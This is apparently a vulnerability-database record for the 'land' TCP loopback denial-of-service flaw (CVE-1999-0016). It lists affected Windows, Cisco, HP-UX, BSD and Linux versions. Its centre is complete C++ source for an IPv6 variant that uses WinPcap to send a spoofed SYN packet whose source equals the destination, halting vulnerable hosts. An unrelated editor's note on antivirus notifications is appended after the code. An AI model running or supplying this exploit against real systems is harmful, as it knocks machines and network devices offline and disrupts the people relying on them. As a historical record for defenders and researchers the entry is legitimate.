ID
VAR-E-199711-0001
CVE
cve_id: | CVE-1999-0016 | Trust: 1.9 |
cve_id: | CVE-2005-0688 | Trust: 0.6 |
cve_id: | CVE-2005-1649 | Trust: 0.3 |
EDB ID
20811
TITLE
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2) - Multiple dos Exploit
Trust: 0.6
DESCRIPTION
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2). CVE-1999-0016CVE-14789 . dos exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.10 | Trust: 1.2 |
vendor: | freebsd | model: | hp-ux kernel windows nt 4.0/server netbsd | scope: | eq | version: | 2.x/9/10/11/2.0.3/2003/1 | Trust: 1.0 |
vendor: | sun | model: | sunos | scope: | eq | version: | 4.1.4 | Trust: 0.6 |
vendor: | sun | model: | sunos u1 | scope: | eq | version: | 4.1.3 | Trust: 0.6 |
vendor: | sco | model: | unixware | scope: | eq | version: | 2.1 | Trust: 0.6 |
vendor: | sco | model: | open server | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | sco | model: | open desktop | scope: | eq | version: | 3.0 | Trust: 0.6 |
vendor: | sco | model: | cmw+ | scope: | eq | version: | 3.0 | Trust: 0.6 |
vendor: | novell | model: | netware | scope: | eq | version: | 4.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.2.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.2 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows xp tablet pc edition sp2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp tablet pc edition sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp tablet pc edition | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp professional sp2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp professional sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp professional | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp media center edition sp2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp media center edition sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp media center edition | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp home sp2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp home sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp home | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp 64-bit edition version sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows xp 64-bit edition version | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows xp 64-bit edition sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp 64-bit edition | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows server web edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server web edition sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server web edition | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server standard edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server standard edition sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server standard edition | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition itanium sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition itanium sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition itanium | scope: | eq | version: | 20030 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition itanium sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition itanium sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition itanium | scope: | eq | version: | 20030 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation sp3 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation sp2 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation sp1 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server sp3 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server sp2 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server sp1 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server sp3 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server sp2 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server sp1 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server sp3 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server sp2 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server sp1 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt | scope: | eq | version: | 3.5.1 | Trust: 0.6 |
vendor: | microsoft | model: | windows | scope: | eq | version: | 95 | Trust: 0.6 |
vendor: | marconi | model: | atm switch | scope: | eq | version: | 7.0.1 | Trust: 0.6 |
vendor: | marconi | model: | atm switch | scope: | eq | version: | 6.1.1 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | eq | version: | 2.0.31 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | eq | version: | 2.0.30 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.24 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.0 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.30 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.20 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.16 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.01 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.0 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.5 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.4 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.3 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.6.1 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.6 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.5 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1x | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1 | Trust: 0.6 |
vendor: | cisco | model: | ios/700 | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.2 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.1 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.0 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | eq | version: | 10.3 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.1 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.0.1 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.0 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 1.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3.2 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation sp4 | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server sp4 | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server sp4 | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server sp4 | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.2.10 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.2 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.1.x | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.1 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.38 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.37 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.36 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.35 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.34 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.33 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.32 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.8 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.6 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.2 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | ne | version: | 3.x | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.2.10 | Trust: 0.6 |
vendor: | cisco | model: | ios p | scope: | ne | version: | 11.2.9 | Trust: 0.6 |
vendor: | cisco | model: | ios f1 | scope: | ne | version: | 11.2.4 | Trust: 0.6 |
vendor: | cisco | model: | ios f | scope: | ne | version: | 11.2.4 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.2.4 | Trust: 0.6 |
vendor: | cisco | model: | ios ia | scope: | ne | version: | 11.1.15 | Trust: 0.6 |
vendor: | cisco | model: | ios ca | scope: | ne | version: | 11.1.15 | Trust: 0.6 |
vendor: | cisco | model: | ios aa | scope: | ne | version: | 11.1.15 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.1.15 | Trust: 0.6 |
vendor: | cisco | model: | ios ia | scope: | ne | version: | 11.1.9 | Trust: 0.6 |
vendor: | cisco | model: | ios ca | scope: | ne | version: | 11.1.7 | Trust: 0.6 |
vendor: | cisco | model: | ios aa | scope: | ne | version: | 11.1.7 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.1.7 | Trust: 0.6 |
vendor: | cisco | model: | ios bt | scope: | ne | version: | 11.0.17 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.0.17 | Trust: 0.6 |
vendor: | cisco | model: | ios bt | scope: | ne | version: | 11.0.12 | Trust: 0.6 |
vendor: | cisco | model: | ios a | scope: | ne | version: | 10.3.19 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 10.3.16 | Trust: 0.6 |
vendor: | cisco | model: | catalyst supervisor software | scope: | ne | version: | 29xx2.4.401 | Trust: 0.6 |
vendor: | cisco | model: | catalyst supervisor software | scope: | ne | version: | 29xx2.1.1102 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 4.0.1 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 3.1 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 3.0 | Trust: 0.6 |
vendor: | freebsd | model: | 2.x,hp-ux 9/10/11,kernel 2.0.3,windows nt 4.0/server 2003,netbsd | scope: | eq | version: | 1 | Trust: 0.6 |
vendor: | microsoft | model: | windows xp professional edition | scope: | eq | version: | x64 | Trust: 0.3 |
vendor: | microsoft | model: | windows xp gold | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | microsoft | model: | windows xp embedded sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp embedded | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | microsoft | model: | windows server standard edition | scope: | eq | version: | 2003x64 | Trust: 0.3 |
vendor: | microsoft | model: | windows server enterprise edition | scope: | eq | version: | 2003x64 | Trust: 0.3 |
vendor: | microsoft | model: | windows server datacenter edition | scope: | eq | version: | 2003x64 | Trust: 0.3 |
vendor: | avaya | model: | modular messaging | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp3 alpha | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp3 | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp2 | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp1 | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp6 | scope: | ne | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp5 | scope: | ne | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp4 | scope: | ne | version: | 4.0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
//
// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135
//
// Written by: Konrad Malewski.
//
#include <stdlib.h>
#include <stdio.h>
#include <Winsock2.h>
#include <ws2tcpip.h>
#include <pcap.h>
#include <remote-ext.h>
///////////////////////////////////////////////////////////////////////////////
///////////// from libnet /////////////
/* ethernet addresses are 6 octets long */
#define ETHER_ADDR_LEN 0x6
typedef unsigned char u_int8_t;
typedef unsigned short u_int16_t;
typedef unsigned int u_int32_t;
typedef unsigned __int64 u_int64_t;
/*
* Ethernet II header
* Static header size: 14 bytes
*/
struct libnet_ethernet_hdr
{
u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
u_int16_t ether_type; /* protocol */
};
struct libnet_in6_addr
{
union
{
u_int8_t __u6_addr8[16];
u_int16_t __u6_addr16[8];
u_int32_t __u6_addr32[4];
} __u6_addr; /* 128-bit IP6 address */
};
/*
* IPv6 header
* Internet Protocol, version 6
* Static header size: 40 bytes
*/
struct libnet_ipv6_hdr
{
u_int8_t ip_flags[4]; /* version, traffic class, flow label */
u_int16_t ip_len; /* total length */
u_int8_t ip_nh; /* next header */
u_int8_t ip_hl; /* hop limit */
struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */
};
/*
* TCP header
* Transmission Control Protocol
* Static header size: 20 bytes
*/
struct libnet_tcp_hdr
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
u_int32_t th_seq; /* sequence number */
u_int32_t th_ack; /* acknowledgement number */
u_int8_t th_x2:4, /* (unused) */
th_off:4; /* data offset */
u_int8_t th_flags; /* control flags */
u_int16_t th_win; /* window */
u_int16_t th_sum; /* checksum */
u_int16_t th_urp; /* urgent pointer */
};
int libnet_in_cksum(u_int16_t *addr, int len)
{
int sum;
union
{
u_int16_t s;
u_int8_t b[2];
}pad;
sum = 0;
while (len > 1)
{
sum += *addr++;
len -= 2;
}
if (len == 1)
{
pad.b[0] = *(u_int8_t *)addr;
pad.b[1] = 0;
sum += pad.s;
}
return (sum);
}
#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff))
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
u_char packet[74];
struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;
u_char errbuf[1024];
pcap_t *pcap_handle;
void usage(char* n)
{
pcap_if_t * alldevs,*d;
int i=1;
fprintf(stdout,"Usage:\n"
"\t %s <device> <victim> <port>\n",n);
if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
{
fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
exit(EXIT_FAILURE);
}
printf("Avaliable adapters: \n");
d = alldevs;
while (d!=NULL)
{
printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
d = d->next;
}
pcap_freealldevs (alldevs);
}
///////////////////////////////////////////////////////////////////////////////
int main(int argc, char* argv[])
{
if ( argc<4 )
{
usage(argv[0]);
return EXIT_FAILURE;
}
int retVal;
struct addrinfo hints,*addrinfo;
ZeroMemory(&hints,sizeof(hints));
WSADATA wsaData;
if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
{
fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
return EXIT_FAILURE;
}
//
// Get MAC address of remote host (assume link local IpV6 address)
//
hints.ai_family = PF_INET6;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
hints.ai_flags = AI_PASSIVE;
retVal = getaddrinfo(argv[2],0, &hints, &addrinfo);
if ( retVal!=0 )
{
WSACleanup();
fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());
exit(EXIT_FAILURE);
}
//
// Open WinPCap adapter
//
if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL )
{
freeaddrinfo(addrinfo);
WSACleanup();
fprintf(stderr, "Error opening device: %s\n",argv[1]);
return EXIT_FAILURE;
}
ZeroMemory(packet,sizeof(packet));
struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;
// fill ethernet header
eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something;
eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
eth_hdr->ether_type = 0xdd86;
// fill IP header
// source ip == destination ip
memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
ip6_hdr->ip_hl = 255;
ip6_hdr->ip_nh = IPPROTO_TCP;
ip6_hdr->ip_len = htons (20);
ip6_hdr->ip_flags[0] = 0x06 << 4;
srand((unsigned int) time(0));
// fill tcp header
tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source port equal to destination
tcp_hdr->th_seq = rand();
tcp_hdr->th_ack = rand();
tcp_hdr->th_off = htons(5);
tcp_hdr->th_win = rand();
tcp_hdr->th_sum = 0;
tcp_hdr->th_urp = htons(10);
tcp_hdr->th_off = 5;
tcp_hdr->th_flags = 2;
// calculate tcp checksum
int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));
chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr));
tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
// send data to wire
retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
if ( retVal == -1 )
{
fprintf(stderr,"Error writing packet to wire!!\n");
}
//
// close adapter, free mem.. etc..
//
pcap_close(pcap_handle);
freeaddrinfo(addrinfo);
WSACleanup();
return EXIT_SUCCESS;
}
--
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--
Trust: 1.0
EXPLOIT LANGUAGE
cpp
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'land.c' loopback Denial of Service (2)
Trust: 1.0
CREDITS
Konrad Malewski
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-1999-0016 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 20811 | Trust: 1.9 |
db: | BID | id: | 2666 | Trust: 1.9 |
db: | NVD | id: | CVE-2005-0688 | Trust: 0.6 |
db: | EDBNET | id: | 42937 | Trust: 0.6 |
db: | NVD | id: | CVE-2005-1649 | Trust: 0.3 |
db: | BID | id: | 13658 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-1999-0016 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/2666/info | Trust: 1.0 |
url: | http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx | Trust: 0.6 |
url: | http://support.microsoft.com/support/kb/articles/q165/0/05.asp | Trust: 0.6 |
url: | http://www.cisco.com/warp/public/770/land-pub.shtml#iosvers | Trust: 0.6 |
url: | http://support.novell.com/cgi-bin/search/tidfinder.cgi?2932511 | Trust: 0.6 |
url: | http://support.microsoft.com/support/kb/articles/q177/5/39.asp | Trust: 0.6 |
url: | http://www.securityfocus.com/archive/1/392354 | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/20811/ | Trust: 0.6 |
url: | http://support.avaya.com/elmodocs2/security/asa-2006-217.htm | Trust: 0.3 |
url: | http://www.microsoft.com/technet/security/bulletin/ms06-064.mspx | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20812 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20810 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20814 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20813 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20811 | Trust: 0.3 |
SOURCES
db: | BID | id: | 13658 |
db: | BID | id: | 2666 |
db: | EXPLOIT-DB | id: | 20811 |
db: | EDBNET | id: | 42937 |
LAST UPDATE DATE
2022-07-27T09:17:41.155000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 13658 | date: | 2016-07-06T14:40:00 |
db: | BID | id: | 2666 | date: | 2009-07-11T06:06:00 |
SOURCES RELEASE DATE
db: | BID | id: | 13658 | date: | 2005-05-17T00:00:00 |
db: | BID | id: | 2666 | date: | 1997-11-20T00:00:00 |
db: | EXPLOIT-DB | id: | 20811 | date: | 1997-11-20T00:00:00 |
db: | EDBNET | id: | 42937 | date: | 1997-11-20T00:00:00 |